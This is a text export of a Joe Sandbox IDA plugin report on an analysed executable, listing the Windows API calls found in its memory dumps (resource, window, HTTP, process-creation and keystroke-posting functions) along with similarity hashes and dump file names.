                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00F0AE11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1426640281-0
                                                                                        • Opcode ID: 4e86853a1e1b45678e696a4cf18986eeb950375475fdd4b865885b42064de191
                                                                                        • Instruction ID: 81b543c13e15e1f4285ff537ec8a87cb505543cfc1e46f185c1960b51ddae03b
                                                                                        • Opcode Fuzzy Hash: 4e86853a1e1b45678e696a4cf18986eeb950375475fdd4b865885b42064de191
                                                                                        • Instruction Fuzzy Hash: 4781B2B1E053458FDB14CF68C8806AABBF0AF4A335B24425DD4A6AB3D1D7349803FB56
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 00F267FD
                                                                                        • __swprintf.LIBCMT ref: 00F2680A
                                                                                          • Part of subcall function 00F0172B: __woutput_l.LIBCMT ref: 00F01784
                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00F26834
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00F26840
                                                                                        • LockResource.KERNEL32(00000000), ref: 00F2684D
                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00F2686D
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00F2687F
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00F2688E
                                                                                        • LockResource.KERNEL32(?), ref: 00F2689A
                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00F268F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                        • String ID:
                                                                                        • API String ID: 1433390588-0
                                                                                        • Opcode ID: bfae66cc6b987156cd1d515cd42399f472835830000bcc70a0c36ce172794f49
                                                                                        • Instruction ID: 8d26ea42cd979e2ece7c3dede1f817b4e0ba0152cf8be37311531aee3268fc27
                                                                                        • Opcode Fuzzy Hash: bfae66cc6b987156cd1d515cd42399f472835830000bcc70a0c36ce172794f49
                                                                                        • Instruction Fuzzy Hash: E9318DB1A0022AABDB119FA0ED55AFB7BA8FF08350F008425F912D2150E774D951FBB0
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00EFB496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00EFB4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00EFB4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 00EFB4BD
                                                                                        • GetClientRect.USER32(?), ref: 00F5DD63
                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00F5DD7A
                                                                                        • GetWindowDC.USER32(?), ref: 00F5DD86
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00F5DD95
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F5DDA7
                                                                                        • GetSysColor.USER32(00000005), ref: 00F5DDC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3430376129-0
                                                                                        • Opcode ID: 333e55dc93e11e75f8f4956c6ae1056674423cbbbba7d4e46fc42d625f2af921
                                                                                        • Instruction ID: 0c05a99af76079e11b81c476076fcec350d8cbf1eb87301e67b6385ae3276cb1
                                                                                        • Opcode Fuzzy Hash: 333e55dc93e11e75f8f4956c6ae1056674423cbbbba7d4e46fc42d625f2af921
                                                                                        • Instruction Fuzzy Hash: E1118131A00209EFDB216F64EC08BE93B75EB05325F108221FA76A50E1DBB24941FF21
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,00F1CF50), ref: 00F1CE90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                        • API String ID: 3555792229-1603158881
                                                                                        • Opcode ID: f59a31ad39a5d48720feb334e118c59fbed44a485ba50ca3bd9acdcf32076b6c
                                                                                        • Instruction ID: 65bdf1f3e4f287fdf079b6a3659638eb6a8d2e7ee975302942a0e6fab0335f94
                                                                                        • Opcode Fuzzy Hash: f59a31ad39a5d48720feb334e118c59fbed44a485ba50ca3bd9acdcf32076b6c
                                                                                        • Instruction Fuzzy Hash: 8A91D631A0064AABCB18DF60C881BEAFBB4BF44310F508529E559B7191DF30799AFBD0
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00EE30DC
                                                                                        • CoUninitialize.OLE32(?,00000000), ref: 00EE3181
                                                                                        • UnregisterHotKey.USER32(?), ref: 00EE32A9
                                                                                        • DestroyWindow.USER32(?), ref: 00F55079
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00F550F8
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F55125
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        • Opcode ID: 1cac190dd7214ee03b16a5b93d412f6a8fbf6f4b2e7cc980d0883107f3a22150
                                                                                        • Instruction ID: fe49d190c2e099efcbe69b08ccbb311c2a4f8feee32e6867e8dec16e26e511e7
                                                                                        • Opcode Fuzzy Hash: 1cac190dd7214ee03b16a5b93d412f6a8fbf6f4b2e7cc980d0883107f3a22150
                                                                                        • Instruction Fuzzy Hash: E7914C7060028ACFC715EF25C899B69F3E4FF04705F5451A9E50AB72A2DB70AE1ADF40
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00EFCC15
                                                                                          • Part of subcall function 00EFCCCD: GetClientRect.USER32(?,?), ref: 00EFCCF6
                                                                                          • Part of subcall function 00EFCCCD: GetWindowRect.USER32(?,?), ref: 00EFCD37
                                                                                          • Part of subcall function 00EFCCCD: ScreenToClient.USER32(?,?), ref: 00EFCD5F
                                                                                        • GetDC.USER32 ref: 00F5D137
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F5D14A
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F5D158
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F5D16D
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00F5D175
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F5D200
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        • Opcode ID: 2e4ccc12a987772b9764117b0362b495e54c20c406979c284553ebe91436272d
                                                                                        • Instruction ID: 2eac6ffc3ec4a5b994bd3932b31621ca6a1e6267acfcdd98a3643e5869c97821
                                                                                        • Opcode Fuzzy Hash: 2e4ccc12a987772b9764117b0362b495e54c20c406979c284553ebe91436272d
                                                                                        • Instruction Fuzzy Hash: E0710E31901209DFDF31DF64CC80AFA7BB1FF48366F244269EE55AA2A6C7318845EB50
                                                                                        APIs
                                                                                          • Part of subcall function 00EFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EFB35F
                                                                                          • Part of subcall function 00EFB63C: GetCursorPos.USER32(000000FF), ref: 00EFB64F
                                                                                          • Part of subcall function 00EFB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00EFB66C
                                                                                          • Part of subcall function 00EFB63C: GetAsyncKeyState.USER32(00000001), ref: 00EFB691
                                                                                          • Part of subcall function 00EFB63C: GetAsyncKeyState.USER32(00000002), ref: 00EFB69F
                                                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00F4ED3C
                                                                                        • ImageList_EndDrag.COMCTL32 ref: 00F4ED42
                                                                                        • ReleaseCapture.USER32 ref: 00F4ED48
                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00F4EDF0
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F4EE03
                                                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00F4EEDC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                        • API String ID: 1924731296-2107944366
                                                                                        • Opcode ID: 130d329a71ff49d9b0d3579073dd52fa48ca3044406f8c6b8551c00b8e3aec6f
                                                                                        • Instruction ID: d26c97512d969876346ef26313514e359f6822b7d63e22d3d5479d35b2945a09
                                                                                        • Opcode Fuzzy Hash: 130d329a71ff49d9b0d3579073dd52fa48ca3044406f8c6b8551c00b8e3aec6f
                                                                                        • Instruction Fuzzy Hash: 1551AC70604308AFD710DF24CC96F6A7BE4FB88314F14492DF995A72E2DBB0A904EB52
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F345FF
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F3462B
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F3466D
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F34682
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F3468F
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F346BF
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00F34706
                                                                                          • Part of subcall function 00F35052: GetLastError.KERNEL32(?,?,00F343CC,00000000,00000000,00000001), ref: 00F35067
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 1241431887-3916222277
                                                                                        • Opcode ID: bf34da39360408890584d567b48b5573817ca4b21a556479fa63b8776b969140
                                                                                        • Instruction ID: 2d62bf2c757283d7ca13f3fb129d8b9052416e4e4fa88ce2ddfeff4490dc50df
                                                                                        • Opcode Fuzzy Hash: bf34da39360408890584d567b48b5573817ca4b21a556479fa63b8776b969140
                                                                                        • Instruction Fuzzy Hash: F64192B1A01609BFEB059F50CC86FFB77ACFF09724F004016FA159A181D7B4AD44ABA5
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F7DC00), ref: 00F3B715
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F7DC00), ref: 00F3B749
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F3B8C1
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00F3B8EB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        • Opcode ID: 70386b2a66d0408792ae9641cf18aa0216becf170eac8424b1cd58be426b7b3e
                                                                                        • Instruction ID: b84d2b9230116c666c4a68e69e779aea2b0adf3f580c30add6a2fc339979ef7e
                                                                                        • Opcode Fuzzy Hash: 70386b2a66d0408792ae9641cf18aa0216becf170eac8424b1cd58be426b7b3e
                                                                                        • Instruction Fuzzy Hash: 86F11971A00109EFCF04DF94C898EAEB7B9FF49325F108499FA15AB250DB75AE42DB50
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00F424F5
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F42688
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F426AC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F426EC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F4270E
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F4286F
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F428A1
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F428D0
                                                                                        • CloseHandle.KERNEL32(?), ref: 00F42947
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        • Opcode ID: 9bdb8f19ae9f7d6fe2d0cbab1b93fa000e9eb3aeb20a8fcca80fb75f10f237d2
                                                                                        • Instruction ID: c8a8ab2da0c8a4c91d2aa50ce0f0a8b6052839677f4031d352b365633d3a0d00
                                                                                        • Opcode Fuzzy Hash: 9bdb8f19ae9f7d6fe2d0cbab1b93fa000e9eb3aeb20a8fcca80fb75f10f237d2
                                                                                        • Instruction Fuzzy Hash: A1D1B031604244DFC714EF25C891B6EBBE5BF84324F18846DF999AB2A2DB31DC41DB52
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F4B3F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        • Opcode ID: b61d3b9dfa1e916c59b06f664dc2199017028cac3f786a4dc3f6a732a30bc8f6
                                                                                        • Instruction ID: 2344f9ff33e422cccce40b5fbf2df0043b55f39ad45bf3b87764185323bfba00
                                                                                        • Opcode Fuzzy Hash: b61d3b9dfa1e916c59b06f664dc2199017028cac3f786a4dc3f6a732a30bc8f6
                                                                                        • Instruction Fuzzy Hash: F151B331A04208BFEF249F29CC85BAD7FA4AB05764F284011FE25E62E3D775E940BB51
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F5DB1B
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F5DB3C
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F5DB51
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F5DB6E
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F5DB95
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00EFA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00F5DBA0
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F5DBBD
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00EFA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00F5DBC8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 1268354404-0
                                                                                        • Opcode ID: c421331b77f85ded3f0d756b0a74653d505a66888c8b416faf174a3b5081427a
                                                                                        • Instruction ID: 6a6b13a7890311b460b734d77bd641fdc920e45e0a8c542b7b767da172452ab6
                                                                                        • Opcode Fuzzy Hash: c421331b77f85ded3f0d756b0a74653d505a66888c8b416faf174a3b5081427a
                                                                                        • Instruction Fuzzy Hash: 2A517070A00209EFDB24DF64CC81FAA77F5BB48354F150529FA1AEA2D0D7B0AC50EB50
                                                                                        APIs
                                                                                          • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F25FA6,?), ref: 00F26ED8
                                                                                          • Part of subcall function 00F26EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F25FA6,?), ref: 00F26EF1
                                                                                          • Part of subcall function 00F272CB: GetFileAttributesW.KERNEL32(?,00F26019), ref: 00F272CC
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00F275CA
                                                                                        • _wcscmp.LIBCMT ref: 00F275E2
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F275FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: 6379dd020d4912afe0b79b0a2ba1b9c3d4907e8166aac4303300ed4252ab682b
                                                                                        • Instruction ID: 8493f866c29548d1369d09b105fec16845daffa37ea33176849c430d72000fed
                                                                                        • Instruction Fuzzy Hash: 725100B2E092299ADF54EB94EC519DE73BCAF08320F1040AAF605E3541EB7496C5DF64
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F5DAD1,00000004,00000000,00000000), ref: 00EFEAEB
                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00F5DAD1,00000004,00000000,00000000), ref: 00EFEB32
                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00F5DAD1,00000004,00000000,00000000), ref: 00F5DC86
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00F5DAD1,00000004,00000000,00000000), ref: 00F5DCF2
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: 521af8b6cc58f2dc99bc08d07be6ff59be51284d6a7abebd5113a70a7ffe5d00
                                                                                        • Instruction ID: 7f3233c69e1165dc34ca5b494afa40a3e69bb2972a2ae3d23705dd9562b16ec3
                                                                                        • Instruction Fuzzy Hash: 72414A70709688DAC7354B28CD8DB7A7A96FB81319F19240DF357A6771C6B1B844E311
                                                                                        APIs
                                                                                          • Part of subcall function 00F1D342: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1D362
                                                                                          • Part of subcall function 00F1D342: GetCurrentThreadId.KERNEL32 ref: 00F1D369
                                                                                          • Part of subcall function 00F1D342: AttachThreadInput.USER32(00000000,?,00F1C005,?,00000001), ref: 00F1D370
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F1C010
                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F1C02D
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F1C030
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F1C039
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F1C057
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F1C05A
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F1C063
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F1C07A
